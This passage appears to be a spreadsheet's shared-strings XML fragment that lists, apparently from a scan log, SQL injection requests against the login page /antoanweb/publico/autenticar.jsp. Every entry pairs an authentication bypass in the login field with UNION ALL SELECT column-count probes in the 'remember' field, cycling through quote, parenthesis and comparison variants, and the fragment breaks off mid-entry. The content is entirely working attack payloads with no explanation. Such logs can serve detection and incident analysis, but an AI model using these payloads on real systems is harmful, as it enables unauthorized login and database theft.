    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null--and(('zpez'='zpez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null--and(('ireg'='ireg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null--and(('qslk'='qslk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null--and(('bxiz'='bxiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null--and(('wbbj'='wbbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null--and(('hahr'='hahr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null--and(('tjxy'='tjxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null--and(('hbvz'='hbvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull--and((('hoap'='hoap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null--and((('ctuw'='ctuw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null--and((('mmiu'='mmiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null--and((('qtrq'='qtrq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null--and((('kukc'='kukc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null--and((('kgpl'='kgpl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null--and((('cgvu'='cgvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null--and((('enaw'='enaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null--and((('cvlr'='cvlr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null--and((('gkda'='gkda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull--and'fwsc'='fwsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null--and'ertl'='ertl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null--and'iqup'='iqup&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null--and'tyjb'='tyjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null--and'oolb'='oolb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null--and'iqrj'='iqrj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null--and'faxb'='faxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null--and'laal'='laal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null--and'opfr'='opfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null--and'rjle'='rjle&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull--and('pebx'like'pebx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null--and('boha'like'boha&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null--and('jxrm'like'jxrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null--and('wbdk'like'wbdk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null--and('rskr'like'rskr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null--and('zlth'like'zlth&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null--and('bybn'like'bybn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null--and('jiir'like'jiir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null--and('gqbu'like'gqbu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null--and('ihrm'like'ihrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull--and(('omxf'like'omxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null--and(('csxt'like'csxt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null--and(('ocin'like'ocin&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null--and(('kvgj'like'kvgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null--and(('dvup'like'dvup&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null--and(('eqko'like'eqko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null--and(('ehfm'like'ehfm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null--and(('nace'like'nace&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null--and(('lkrw'like'lkrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null--and(('kaja'like'kaja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull--and((('spwy'like'spwy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null--and((('covw'like'covw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null--and((('jjvc'like'jjvc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null--and((('jnkj'like'jnkj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null--and((('qzub'like'qzub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null--and((('rzxi'like'rzxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null--and((('bmbd'like'bmbd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null--and((('pwaq'like'pwaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null--and((('bcyq'like'bcyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null--and((('uzhv'like'uzhv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull--and'spae'like'spae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null--and'boqi'like'boqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null--and'kkjq'like'kkjq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null--and'glkz'like'glkz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null--and'fieg'like'fieg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null--and'ocfu'like'ocfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null--and'zafc'like'zafc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null--and'nguv'like'nguv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null--and'tnza'like'tnza&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null--and'myhv'like'myhv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull--and("gkwk"="gkwk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null--and("oilk"="oilk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null--and("rsur"="rsur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null--and("vzjq"="vzjq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null--and("iuxy"="iuxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null--and("sevs"="sevs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null--and("gecx"="gecx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null--and("pbse"="pbse&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null--and("qcbt"="qcbt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null--and("gzri"="gzri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull--and(("gfvy"="gfvy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null--and(("ovhq"="ovhq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null--and(("gqdb"="gqdb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null--and(("anyk"="anyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null--and(("jekg"="jekg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null--and(("fnhg"="fnhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null--and(("onxo"="onxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null--and(("oteg"="oteg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null--and(("svng"="svng&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null--and(("vzzj"="vzzj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull--and((("tdib"="tdib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null--and((("syqb"="syqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null--and((("bedl"="bedl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null--and((("xraj"="xraj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null--and((("toqo"="toqo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null--and((("jmvp"="jmvp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null--and((("shkr"="shkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null--and((("uyvq"="uyvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null--and((("thoa"="thoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null--and((("rush"="rush&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull--and"vzmk"="vzmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null--and"wvni"="wvni&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null--and"okfn"="okfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null--and"juwj"="juwj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null--and"ijqz"="ijqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null--and"duyi"="duyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null--and"pgni"="pgni&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null--and"ohlo"="ohlo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null--and"grhh"="grhh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null--and"alnz"="alnz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull--and("ennt"like"ennt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null--and("gohd"like"gohd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null--and("vexu"like"vexu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null--and("lile"like"lile&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null--and("uxyx"like"uxyx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null--and("uktc"like"uktc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null--and("vjdl"like"vjdl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null--and("ogtp"like"ogtp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null--and("ycyj"like"ycyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null--and("lpai"like"lpai&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull--and(("bmqj"like"bmqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null--and(("cknd"like"cknd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null--and(("dkkx"like"dkkx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null--and(("lbom"like"lbom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null--and(("twvd"like"twvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null--and(("fnkq"like"fnkq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null--and(("rdkh"like"rdkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null--and(("cxfj"like"cxfj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null--and(("urez"like"urez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null--and(("wcil"like"wcil&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull--and((("lkwy"like"lkwy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null--and((("uftw"like"uftw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null--and((("ffsc"like"ffsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null--and((("rxxf"like"rxxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null--and((("ugyu"like"ugyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null--and((("lhtp"like"lhtp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null--and((("gale"like"gale&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null--and((("flan"like"flan&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null--and((("lvda"like"lvda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null--and((("pbej"like"pbej&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull--and"nvib"like"nvib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null--and"slnk"like"slnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null--and"obtu"like"obtu&amp;modo=entrar</t>
  </si>
  <si>
